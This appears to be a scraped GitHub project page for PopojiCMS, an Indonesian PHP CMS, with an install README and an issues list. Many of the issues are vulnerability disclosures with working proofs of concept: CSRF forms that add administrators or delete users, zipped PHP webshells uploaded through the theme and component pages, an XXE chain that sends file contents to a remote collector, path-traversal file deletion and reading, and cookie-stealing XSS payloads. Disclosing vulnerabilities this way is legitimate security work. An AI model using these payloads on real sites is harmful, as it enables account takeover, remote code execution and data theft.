popojicms / popojicms Goto Github PK

View Code? Open in Web Editor NEW

43.0 43.0 52.0 15.71 MB

PopojiCMS - Buat Sendiri Rasa Webmu

Home Page: http://www.popojicms.org

License: MIT License

PHP 45.32% JavaScript 17.68% HTML 19.31% CSS 15.15% ActionScript 2.33% TeX 0.08% SCSS 0.05% Handlebars 0.08%

popojicms's Introduction

PopojiCMS

Free Content Management System - Indonesia Contact : [email protected]

Cara instalasi PopojiCMS

Extract file popojicms.v.x.x.x.zip di directory web Anda.
Buatlah database baru yang nantinya sebagai tempat instalasi tabel-tabel.
Melalui browser Anda, masuk ke alamat web dimana file popojicms.v.x.x.x.zip tadi diextract.
Ikuti petunjuk instalasi dengan benar.
Jika instalasi berhasil, hapuslah atau rename file install.php dan hapus README file ini dari directory web Anda.
PopojiCMS siap untuk digunakan.

Catatan (harap dibaca)

Localhost

Jika diinstall pada localhost maka pastikan settingan rewrite_module = on

Error 500

Jika terjadi error 500 internal server error (web telah di hosting), kemungkinan karena pada file .htaccess belum ada baris code RewriteBase /. Solusinya adalah dengan menambahkan baris code RewriteBase / sebelum code RewriteEngine on

Masalah Redirect

Jika terjadi error The page isn't redirecting properly atau This webpage has a redirect loop maka langkah yang bisa dilakukan adalah sebagai berikut:

Coba periksa kembali apakah rewrite_module sudah on atau belum.
Periksa apakah file .htaccess tercopy pada server local atau hosting dengan baik.
Setelah itu clear cache browser Anda.

Kemungkinan File error

Jika terdapat error yang lain, mungkin karena hasil extract file yang tidak sempurna, silahkan replace file-file yang error tersebut.

Permission

Untuk di hosting, lakukan perubahan user permission untuk folder po-upload menjadi 775 (po-content --> uploads).

Login backend PopojiCMS

Masuk ke alamat http://nama.web.anda/po-admin
Masukkan data login sebagai berikut : Username : seperti yg telah diinputkan pada saat proses instalasi. Password : seperti yg telah diinputkan pada saat proses instalasi.

Terima Kasih Kepada

Tuhan Yang Maha Esa
Orang-orang yang berada di belakang PopojiCMS
Aries sebagai pembuat template backend v.1.0.1 - v.1.1.1
Aquincum sebagai pembuat template backend v.1.1.2 - v.1.2.2
ProUI sebagai pembuat template backend v.1.2.3 - v.1.3.0
Enews, Magazine, Andia, Brownie, Wiretree, Neon, Pressroom dan Canvas sebagai pembuat template frontend
StructureCore Installation sebagai referensi modul instalasi
Easy Menu Manager sebagai pembuat component menu manager
FluentPDO, Bramus, Plates dan semua library php yang dipakai pada PopojiCMS
Jquery, Bootstrap dan semua plugins jquery yang dipakai pada PopojiCMS

popojicms's People

Contributors

Stargazers

Watchers

Forkers

bluedragonid robertskcode xbangka pramana08 bmotech falahdev hadesain septareosagita mayangulfiee luqman92 hanyabayhaqi creativefull gestjava henrydewa rad4n alvacorp razamal jenalgit godgoali apolbox punk-hazard ekospinach willians7 vickazy cafeiklan pockyme franco77 rifal89 rakhmadtri kadalngesot bmtechno rahmatcmos shpynx aseppakot sitinuroh rasapant basirsharif soekee bayu-bantenk dgame89 efriaman smkitnurulqolbi wakidanwar ryanbekabe junandia gibrandev alsyundawy aryo07 biladina yam8859 rahmansurya dharmajaya88

popojicms's Issues

Please update phpmailer

Reff PHPMailer/PHPMailer#922

I found a file upload issue exist in v2.0.1 of PopojiCMS

One: use file upload issue vulnerability to getshell
Vulnerability details:
Use known CSRF to obtain background permissions and we can upload the maliciously constructed zip file at the page of add theme.
Vulnerability url: http://127.0.0.1:1000/po-admin/admin.php?mod=theme&act=addnew
steps:
1.We need to get background permission.
2.Prepare zip files which include malicious php file.
3.We can upload file in "Home Dashboard / Add Theme".
4.We can find the php file in http://127.0.0.1:1000/po-content/themes/folder_name/file_name

Warning: count(): Parameter must be an array or an object that implements Countable in C:\xampp\htdocs\sinarbajaelectric\po-includes\core\vendor\fluentpdo\BaseQuery.php on line 226

mohon pencerahannya

Stored XSS on Post feature

Hi, @abdilahrf and I found a stored XSS vulnerability on the Post feature.
By intercepting the request, we are able to edit the request body to insert a XSS payload.

and it is executed just fine

Storage XSS in Tambah Pengguna

version:1.2
poc:'"><script>alert(document.cookie)</script>@test.com
The mailbox is written as XSS malicious code when a new user is added

Click Edit to view user information in pengguna after adding users

XSS triggered successfully

User Level Category

Mau tanya pak dwi, disini kan sudah ada edit untuk user levelnya berdasarkan category dll. yang mau saya tanyakan, bisa tidak user levelnya di bedakan berdasarkan post category?
Contoh :
Category : INDONESIAKU dan MOTIVASI
User : admin1 dan admin2

user admin1 hanya bisa update / post dari Category INDONESIAKU begitupun sebaliknya. terima kasih

Tidak bisa jalan di NGINX

Halo bagaimana supaya bisa jalan di server nginx... terima kasih

I found a CSRF vulnerability to add administrator

One: use CSRF vulnerability to add administrator
Vulnerability details:
When the administrator logs in, opening the webpage will automatically add a administrator
Vulnerability url: http://127.0.0.1/popojicms/po-admin/admin.php?mod=user&act=addnew
Vulnerability POC:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>OWASP CRSFTester Demonstration</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "12","8","12" );

function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;

    do { curDate = new Date(); }
    while(curDate-date < millis);
}

function fireForms()
{
    var count = 3;
    var i=0;
    
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
        
        pausecomp(pauses[i]);
    }
}
    
</script>
<H2>OWASP CRSFTester Demonstration</H2>
<form method="POST" name="form0" action="http://127.0.0.1:80/popojicms/po-admin/route.php?mod=user&act=addnew">
<input type="hidden" name="username" value="fatmo006"/>
<input type="hidden" name="nama_lengkap" value="fatmo006"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="repeatpass" value="123456"/>
<input type="hidden" name="email" value="[email protected]"/>
<input type="hidden" name="no_telp" value="000-0000-9001"/>
<input type="hidden" name="level" value="1"/>
</form>
<form method="GET" name="form1" action="http://127.0.0.1:80/popojicms/po-admin/admin.php?mod=user">
<input type="hidden" name="name" value="value"/> 
</form>

</body>
</html>

I found a CSRF vulnerability that can add a super administrator account directly

    POST /PopojiCMS/po-admin/route.php?mod=user&act=addnew HTTP/1.1
    Host: www.test.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 128
    Cookie: iCMS_USER_AUTH=dc043aa07gOqcLfWTuJoLSCrKIkbJNa8SPGk1VUKhacikJl4JxbrK2aBNBbk0bbmKnQwweqtz7vvJ93P2lLGBzezHER9aEK_HMs0_39QpgM5hSdhCCNxDv8Lwtx1RRqZEVpWUZBwAjJe9476soMuCC6-gJ1e_mfMMhYSA8ioWG1OUFUvUW07tVg5F0RUP2oamPz91F-t85bDNOEnubfHpxzFMND3EABDYJN0o1HfVweojEDYaxs-l6VEiuc0fFUlm-MIZXnd5xe1h6std5cCRwRCS_H71q-oTNO3NbuyojT9HVlCafwxmz7BTlmfIRHeADx7DImb_UyY_daATbgMffPsEHs4KApMstm9pbT4D53E8YbyCAnCDog4MQ7tV3snwpSRufPJCdeY3fkJUFyDhfbqTiJXEAxAcOWCoxGwLXWPI-Ns9Tyjh4WJChqpy0_gwa3JSszGZOQZaAf86KqeDKdct-YSE2UN6qwRVvUeOijMZrdzPxaqt_1OzlhDeBPlM4UW4xQMh7VQ3q5TcfpIHclZWiAspuU8Ynnj3XEwAo8; iCMS_userid=b8423c8bm9SnzUz782Y6XmtRdU1dTR3CL9iqL-Iv83vI7htnIg; iCMS_nickname=c3bc646dcSTyka3txmYpDcMW2sUPNhaunl7kIzv0Nf_89GTeIZNk; SESScc7018fb7c828d13ca316e4ca4f83f45=reN7QmxRtg9oImYLl_d5_ZsuNHhcU1_umYek0QW3BUc; PHPSESSID=5o4r0qmiao4kna434n7kdbnn14
    referer: http://www.test.com/fiyocms/
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    
    username=p0desta1&nama_lengkap=p0desta1&password=p0desta&repeatpass=p0desta&email=p0desta%40p0desta.com&no_telp=12121212&level=1

The reason for this problem is the same as above, there is no CSRF protection, then you can get a super administrator account by sending a message to the administrator link, constructing a poc

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
        <form id="p0desta" action="http://www.test.com/PopojiCMS/po-admin/route.php?mod=user&act=addnew" method="POST">
          <input type="hidden" name="username" value="p0desta1" />
          <input type="hidden" name="nama&#95;lengkap" value="p0desta1" />
          <input type="hidden" name="password" value="p0desta" />
          <input type="hidden" name="repeatpass" value="p0desta" />
          <input type="hidden" name="email" value="p0desta&#64;p0desta&#46;com" />
          <input type="hidden" name="no&#95;telp" value="12121212" />
          <input type="hidden" name="level" value="1" />
        </form>
    	<script>document.getElementById('p0desta').submit();</script>
      </body>
    </html>

Submit Not Respond (Button)

Gan, pas klik button submit di new post sama page ga berfungsi yah, ga ada respond apa".
mohon bantuannya

I found a CSRF vulnerability to delete user

One: use CSRF vulnerability to delete user
Vulnerability details:
When the administrator logs in, opening the webpage will automatically delete the specified user.
Vulnerability url: http://127.0.0.1/popojicms/po-admin/admin.php?mod=user
Vulnerability POC:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>OWASP CRSFTester Demonstration</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "7","7","10" );

function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;

    do { curDate = new Date(); }
    while(curDate-date < millis);
}

function fireForms()
{
    var count = 3;
    var i=0;
    
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
        
        pausecomp(pauses[i]);
    }
}
    
</script>
<H2>OWASP CRSFTester Demonstration</H2>
<form method="POST" name="form0" action="http://127.0.0.1:80/popojicms/po-admin/route.php?mod=user&act=multidelete">
<input type="hidden" name="totaldata" value="1"/>
<input type="hidden" name="table-user_length" value="10"/>
<input type="hidden" name="item[0][deldata]" value="5"/>
</form>
<form method="GET" name="form1" action="http://127.0.0.1:80/popojicms/po-admin/admin.php?mod=user">
<input type="hidden" name="name" value="value"/> 
</form>

</body>
</html>

I found a background arbitrary file deletion vulnerability

    POST /PopojiCMS/po-admin/route.php?mod=library&act=delete HTTP/1.1
    Host: www.test.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 20
    Referer: http://www.test.com/fiyocms/
    Cookie: iCMS_USER_AUTH=dc043aa07gOqcLfWTuJoLSCrKIkbJNa8SPGk1VUKhacikJl4JxbrK2aBNBbk0bbmKnQwweqtz7vvJ93P2lLGBzezHER9aEK_HMs0_39QpgM5hSdhCCNxDv8Lwtx1RRqZEVpWUZBwAjJe9476soMuCC6-gJ1e_mfMMhYSA8ioWG1OUFUvUW07tVg5F0RUP2oamPz91F-t85bDNOEnubfHpxzFMND3EABDYJN0o1HfVweojEDYaxs-l6VEiuc0fFUlm-MIZXnd5xe1h6std5cCRwRCS_H71q-oTNO3NbuyojT9HVlCafwxmz7BTlmfIRHeADx7DImb_UyY_daATbgMffPsEHs4KApMstm9pbT4D53E8YbyCAnCDog4MQ7tV3snwpSRufPJCdeY3fkJUFyDhfbqTiJXEAxAcOWCoxGwLXWPI-Ns9Tyjh4WJChqpy0_gwa3JSszGZOQZaAf86KqeDKdct-YSE2UN6qwRVvUeOijMZrdzPxaqt_1OzlhDeBPlM4UW4xQMh7VQ3q5TcfpIHclZWiAspuU8Ynnj3XEwAo8; iCMS_userid=b8423c8bm9SnzUz782Y6XmtRdU1dTR3CL9iqL-Iv83vI7htnIg; iCMS_nickname=c3bc646dcSTyka3txmYpDcMW2sUPNhaunl7kIzv0Nf_89GTeIZNk; SESScc7018fb7c828d13ca316e4ca4f83f45=reN7QmxRtg9oImYLl_d5_ZsuNHhcU1_umYek0QW3BUc; PHPSESSID=5o4r0qmiao4kna434n7kdbnn14
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    
    id=../../p0desta.txt

Vulnerability analysis:

Look at line 167 of the code admin_library.php

    	public function delete()
    	{
    		if (!$this->auth($_SESSION['leveluser'], 'library', 'delete')) {
    			echo $this->pohtml->error();
    			exit;
    		}
    		if (!empty($_POST)) {
    			if ($this->postring->isImage('../'.DIR_CON.'/uploads/'.$_POST['id'])) {
    				if (file_exists('../'.DIR_CON.'/thumbs/'.$_POST['id'])) {
    					unlink('../'.DIR_CON.'/thumbs/'.$_POST['id']);
    				}
    				if (file_exists('../'.DIR_CON.'/uploads/medium/medium_'.$_POST['id'])) {
    					unlink('../'.DIR_CON.'/uploads/medium/medium_'.$_POST['id']);
    				}
    				if (file_exists('../'.DIR_CON.'/uploads/'.$_POST['id'])) {
    					unlink('../'.DIR_CON.'/uploads/'.$_POST['id']);
    				}
    			} else {
    				if (file_exists('../'.DIR_CON.'/uploads/'.$_POST['id'])) {
    					unlink('../'.DIR_CON.'/uploads/'.$_POST['id']);
    				}
    			}
    			$this->poflash->success($GLOBALS['_']['library_message_2'], 'admin.php?mod=library');
    		}
    	}

You can see that you want to delete the image. If it is not the image, it will be deleted. Then we can delete any file across the directory.

Any file read in the background

http://localhost/popojicms/po-admin/admin.php?mod=theme&act=edit&folder=chingsy&id=/../../../../../mysql/my.ini

Database Oracle

Dear All, gimana cara nya yaa supaya bisa di jalankan menggunakan database Oracle?

File upload vulnerability exists in the background can getshell

Background can upload the compression package, do not compress not filter, can getshell. Put webshell in the archive and upload it.
Then we can find the appropriate directory to access getShell
Code position

po-content\component\theme\admin_theme.php 114-128行

if (!empty($_POST)) {
			if (!empty($_FILES['fupload']['tmp_name'])) {
				$exp = explode('.', $_FILES['fupload']['name']);
				$themeName = $this->postring->seo_title($exp[0]).'-'.rand(000000,999999).'-popoji.'.$exp[1];
				if (in_array($exp[1], array('zip'))) {
					move_uploaded_file($_FILES['fupload']['tmp_name'], '../'.DIR_CON.'/uploads/'.$themeName);
					if (file_exists('../'.DIR_CON.'/themes/'.$this->postring->valid($_POST['folder'], 'xss'))) {
						unlink('../'.DIR_CON.'/uploads/'.$themeName);
						$this->poflash->error($GLOBALS['_']['theme_message_4'], 'admin.php?mod=theme');
					} else {
						$archive = new PoPclZip('../'.DIR_CON.'/uploads/'.$themeName);
						if ($archive->extract(PCLZIP_OPT_PATH, '../'.DIR_CON.'/themes/'.$this->postring->valid($_POST['folder'], 'xss')) == 0) {
							unlink('../'.DIR_CON.'/uploads/'.$themeName);
							$this->poflash->error($GLOBALS['_']['theme_message_4'], 'admin.php?mod=theme');

Only determine if the upload is a ZIP archive, or if it is unzipped directly, the directory to be unzipped is

$archive->extract(PCLZIP_OPT_PATH, '../'.DIR_CON.'/themes/'.$this->postring->valid($_POST['folder'], 'xss'))

File upload POC

POST /PopojiCMS/po-admin/route.php?mod=theme&act=addnew HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------2687329433777
    Content-Length: 594
    Origin: null
    Cookie: iCMS_USER_AUTH=dc043aa07gOqcLfWTuJoLSCrKIkbJNa8SPGk1VUKhacikJl4JxbrK2aBNBbk0bbmKnQwweqtz7vvJ93P2lLGBzezHER9aEK_HMs0_39QpgM5hSdhCCNxDv8Lwtx1RRqZEVpWUZBwAjJe9476soMuCC6-gJ1e_mfMMhYSA8ioWG1OUFUvUW07tVg5F0RUP2oamPz91F-t85bDNOEnubfHpxzFMND3EABDYJN0o1HfVweojEDYaxs-l6VEiuc0fFUlm-MIZXnd5xe1h6std5cCRwRCS_H71q-oTNO3NbuyojT9HVlCafwxmz7BTlmfIRHeADx7DImb_UyY_daATbgMffPsEHs4KApMstm9pbT4D53E8YbyCAnCDog4MQ7tV3snwpSRufPJCdeY3fkJUFyDhfbqTiJXEAxAcOWCoxGwLXWPI-Ns9Tyjh4WJChqpy0_gwa3JSszGZOQZaAf86KqeDKdct-YSE2UN6qwRVvUeOijMZrdzPxaqt_1OzlhDeBPlM4UW4xQMh7VQ3q5TcfpIHclZWiAspuU8Ynnj3XEwAo8; iCMS_userid=b8423c8bm9SnzUz782Y6XmtRdU1dTR3CL9iqL-Iv83vI7htnIg; iCMS_nickname=c3bc646dcSTyka3txmYpDcMW2sUPNhaunl7kIzv0Nf_89GTeIZNk; SESScc7018fb7c828d13ca316e4ca4f83f45=reN7QmxRtg9oImYLl_d5_ZsuNHhcU1_umYek0QW3BUc; PHPSESSID=5o4r0qmiao4kna434n7kdbnn14
    referer: http://127.0.0.1/
    Connection: keep-alive
    Cache-Control: max-age=0
    
    -----------------------------2687329433777
    Content-Disposition: form-data; name="theme"
    
    p0desta
    -----------------------------2687329433777
    Content-Disposition: form-data; name="type"
    
    theme
    -----------------------------2687329433777
    Content-Disposition: form-data; name="fupload"; filename="shell.zip"
    Content-Type: application/x-zip-compressed
    
   <?php @eval($_POST['cmd'];) ?>

media sosial and share

saya sudah coba setting di po-admin/admin.php?mod=setting#config memasukan nama, username dan id fb namun tetep tdk berfungsi, mohon pencerahan nya

Storage XSS exists in the message desk at the front desk

Front page contant

Write the following information in the message box.

Background administrator view message board triggers XSS

I found a CSRF vulnerability that can getshell

    POST /PopojiCMS/po-admin/route.php?mod=component&act=addnew HTTP/1.1
    Host: www.test.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------2687329433777
    Content-Length: 594
    Origin: null
    Cookie: iCMS_USER_AUTH=dc043aa07gOqcLfWTuJoLSCrKIkbJNa8SPGk1VUKhacikJl4JxbrK2aBNBbk0bbmKnQwweqtz7vvJ93P2lLGBzezHER9aEK_HMs0_39QpgM5hSdhCCNxDv8Lwtx1RRqZEVpWUZBwAjJe9476soMuCC6-gJ1e_mfMMhYSA8ioWG1OUFUvUW07tVg5F0RUP2oamPz91F-t85bDNOEnubfHpxzFMND3EABDYJN0o1HfVweojEDYaxs-l6VEiuc0fFUlm-MIZXnd5xe1h6std5cCRwRCS_H71q-oTNO3NbuyojT9HVlCafwxmz7BTlmfIRHeADx7DImb_UyY_daATbgMffPsEHs4KApMstm9pbT4D53E8YbyCAnCDog4MQ7tV3snwpSRufPJCdeY3fkJUFyDhfbqTiJXEAxAcOWCoxGwLXWPI-Ns9Tyjh4WJChqpy0_gwa3JSszGZOQZaAf86KqeDKdct-YSE2UN6qwRVvUeOijMZrdzPxaqt_1OzlhDeBPlM4UW4xQMh7VQ3q5TcfpIHclZWiAspuU8Ynnj3XEwAo8; iCMS_userid=b8423c8bm9SnzUz782Y6XmtRdU1dTR3CL9iqL-Iv83vI7htnIg; iCMS_nickname=c3bc646dcSTyka3txmYpDcMW2sUPNhaunl7kIzv0Nf_89GTeIZNk; SESScc7018fb7c828d13ca316e4ca4f83f45=reN7QmxRtg9oImYLl_d5_ZsuNHhcU1_umYek0QW3BUc; PHPSESSID=5o4r0qmiao4kna434n7kdbnn14
    referer: http://www.test.com/fiyocms/
    Connection: keep-alive
    Cache-Control: max-age=0
    
    -----------------------------2687329433777
    Content-Disposition: form-data; name="component"
    
    p0desta
    -----------------------------2687329433777
    Content-Disposition: form-data; name="type"
    
    component
    -----------------------------2687329433777
    Content-Disposition: form-data; name="fupload"; filename="shell.zip"
    Content-Type: application/x-zip-compressed
    
    PK���

The background upload page does not have CSRF protection, so we can construct the poc

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
        <script>
          (function submitRequest()
          {
            var xhr = new XMLHttpRequest();
            xhr.open("POST", "http://www.test.com/PopojiCMS/po-admin/route.php?mod=component&act=addnew", true);
            xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
            xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3");
            xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------2687329433777");
            xhr.withCredentials = true;
            var body = "-----------------------------2687329433777\r\n" + 
              "Content-Disposition: form-data; name=\"component\"\r\n" + 
              "\r\n" + 
              "p0desta\r\n" + 
              "-----------------------------2687329433777\r\n" + 
              "Content-Disposition: form-data; name=\"type\"\r\n" + 
              "\r\n" + 
              "component\r\n" + 
              "-----------------------------2687329433777\r\n" + 
              "Content-Disposition: form-data; name=\"fupload\"; filename=\"shell.zip\"\r\n" + 
              "Content-Type: application/x-zip-compressed\r\n" + 
              "\r\n" + 
              "PK\x03\x04\x14\x00\x00\x08\x08\x00S\x8dSM\xef\x83M\xc6\x1b\x00\x00\x00\x19\x00\x00\x00\t\x00\x00\x00shell.php\xb3\xb1/\xc8(PH-K\xcc\xd1P\x89\x0f\xf0\x0f\x0e\x896\x8c\xd5\xb4V\xb0\xb7\x03\x00PK\x01\x02?\x00\x14\x00\x00\x08\x08\x00S\x8dSM\xef\x83M\xc6\x1b\x00\x00\x00\x19\x00\x00\x00\t\x00$\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00shell.php\n" + 
              "\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00nT\xbd\x11\x90g\xd4\x01\x84n\x12\x04\x90g\xd4\x01\x84n\x12\x04\x90g\xd4\x01PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00[\x00\x00\x00B\x00\x00\x00\x00\x00\r\n" + 
              "-----------------------------2687329433777--\r\n";
            var aBody = new Uint8Array(body.length);
            for (var i = 0; i < aBody.length; i++)
              aBody[i] = body.charCodeAt(i); 
            xhr.send(new Blob([aBody]));
          })();
        </script>
      </body>
    </html>

Then send it to the admin link, then we can getshell.

I found a XXE vulnerability which cause arbitrary file read.

We can find the code causing vulnerability on line 972 in po-content\component\post\admin_post.php:
$importfile = simplexml_load_file('../'.DIR_CON.'/uploads/'.$xmlfile);
This cms use function simplexml_load_file() without funtion libxml_disable_entity_loader(true);,so we can construct a special xml file to read any file in target.
The specific attack flow is as follows：
01 We construct a xml file as follows:

<?xml version="1.0"?>
<!DOCTYPE message [
    <!ENTITY % remote SYSTEM "http://127.0.0.1/vulTest/01-dtd.dtd">  
    <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///E:/flag.txt">
    %remote;
    %send;
]>

02 We construct a dtd file as follows:

<!ENTITY % start "<!ENTITY &#x25; send SYSTEM 'http://127.0.0.1/vulTest/dtdTest.php?con=%file;'>">
%start;

We changed the name of this dtd file to:01-dtd.dtd.

03 We construct a php file as follows:

<?php
    $con = $_GET['con'];
    $con = base64_decode($con);
    $myfile = fopen("fileVal.txt", "w") or die("Unable to open file!");
    fwrite($myfile, $con);
    fclose($myfile);

We changed the name of this dtd file to:dtdTest.php.

04 We prepare a web server and put the dtd file and php file in www\vulTest\ .

05 We visit http://127.0.0.1/popojicms/po-admin/admin.php?mod=home ,click Post->Semua Post->Import dari WP dan PopojiCMSLama.

06 There is a upload page, we can upload xml file to target.

07 Upload our xml file.

08 We can find that the file E:/flag.txt in target machine was downloaded in \WWW\vulTest\fileVal.txt.

Host path leak in upload.php

version:1.2
poc:delete name="file";
Normal upload file

Deleting "name =" file ";" will cause host physical path disclosure

The PopojiCMS 2.0.1 has xss in http://127.0.0.1/PopojiCMS-master/po-admin/admin.php?mod=menumanager

1.login
2.open http://127.0.0.1/PopojiCMS-master/po-admin/admin.php?mod=menumanager
3.edit menu

4.open and input exp "><script>alert("xss")</script>

poc:
POST /PopojiCMS-master/po-admin/route.php?mod=menumanager&act=savemenu HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/PopojiCMS-master/po-admin/admin.php?mod=menumanager
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 130
Cookie: PHPSESSID=mopv5n9iv2lqb9u2nkb85ilro6
Connection: keep-alive

title=dashboard%22%3E%3Cscript%3Ealert(123)%3C%2Fscript%3E&url=admin.php%3Fmod%3Dhome&class=fa-home&active=Y&target=none&menu_id=1

FIX:Filter the id parameter

Demo.popojicms.org

Halo,

Subdomain demo.popojicms.org ada masalah atau memang sudah tidak terdaftar ya?

Thanks :)

I found a XXE vulnerability in this cms, which cause arbitrary file read

I found a CSRF vulnerability

POST /PopojiCMS/po-admin/route.php?mod=user&act=addnew HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/PopojiCMS/po-admin/admin.php?mod=user&act=addnew
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
Connection: close
Cookie: _ga=GA1.1.1523573753.1550292454; PHPSESSID=ebgi7l1qb4hi7jaun2rf98qej7
Upgrade-Insecure-Requests: 1

username=admin&nama_lengkap=admin123&password=admin123&repeatpass=admin123&email=eugene%40addbug.cn&no_telp=12342123412&level=1

username=zjh&nama_lengkap=zjh666&password=admimn123&repeatpass=admin123&email=zjh%40baidu.com&no_telp=12345678910&level=1

Write a POST script

Sent to the site owner, he created an administrator account by opening the link

PopojiCMS v2.0.1 backend plugin function has file upload vulnerability

Exploit file upload vulnerability getshell

Vulnerability details:

In the administration backend, you can upload malicious builds of zip files in the plugin administration page.

Vulnerability url: http://127.0.0.1/po-admin/admin.php?mod=component&act=addnew

Steps:

First you need to have backend access
Prepare zip file containing malicious php
Caricamento di file in Componenti/Aggiungi componente
Next, you can find the php file at http://127.0.0.1/po-content/component/Component_Name/file_name Find the php file

Open Redirection Vulnerability

Hi, @abdilahrf and I found open redirection vulnerability on the PopojiCMS. The vulnerable code is on index.php file line number 101

notice the parameter refer was used by the code to redirect the user's to another page. So by crafting a request that using the POST method and contains the refer parameter, we could control where to redirect the user.

ERROR add kategori dan post

Kok makin banyak yg error gan

I found that the background can getshell

Background GETCHELL

Description: The background can upload a compressed package, uncompressed without filtering, and getshell.

Put a webshell in the archive and upload it.

Then we can access the corresponding directory to getshell.

Code analysis

See line 188 of admin_component.php

if (in_array($exp[1], array('zip'))) {
move_uploaded_file($_FILES['fupload']['tmp_name'], '../'.DIR_CON.'/uploads/'.$componentName);
if (file_exists('../'.DIR_CON.'/'.$folderinstall.'/'.strtolower($this->postring->valid($_POST['component'], 'xss')))) {
    unlink('../'.DIR_CON.'/uploads/'.$componentName);
    $this->poflash->error($GLOBALS['_']['component_message_3'], 'admin.php?mod=component');
} else {
    $archive = new PoPclZip('../'.DIR_CON.'/uploads/'.$componentName);
    if ($archive->extract(PCLZIP_OPT_PATH, '../'.DIR_CON.'/'.$folderinstall.'/'.strtolower($this->postring->valid($_POST['component'], 'xss'))) == 0) {
        unlink('../'.DIR_CON.'/uploads/'.$componentName);
        $this->poflash->error($GLOBALS['_']['component_message_3'], 'admin.php?mod=component');
    }

Only judge whether the upload is a zip archive, if it is directly decompressed, the directory to be extracted is

$archive->extract(PCLZIP_OPT_PATH, '../'.DIR_CON.'/'.$folderinstall.'/'.strtolower($this->postring->valid($_POST['component'], 'xss'))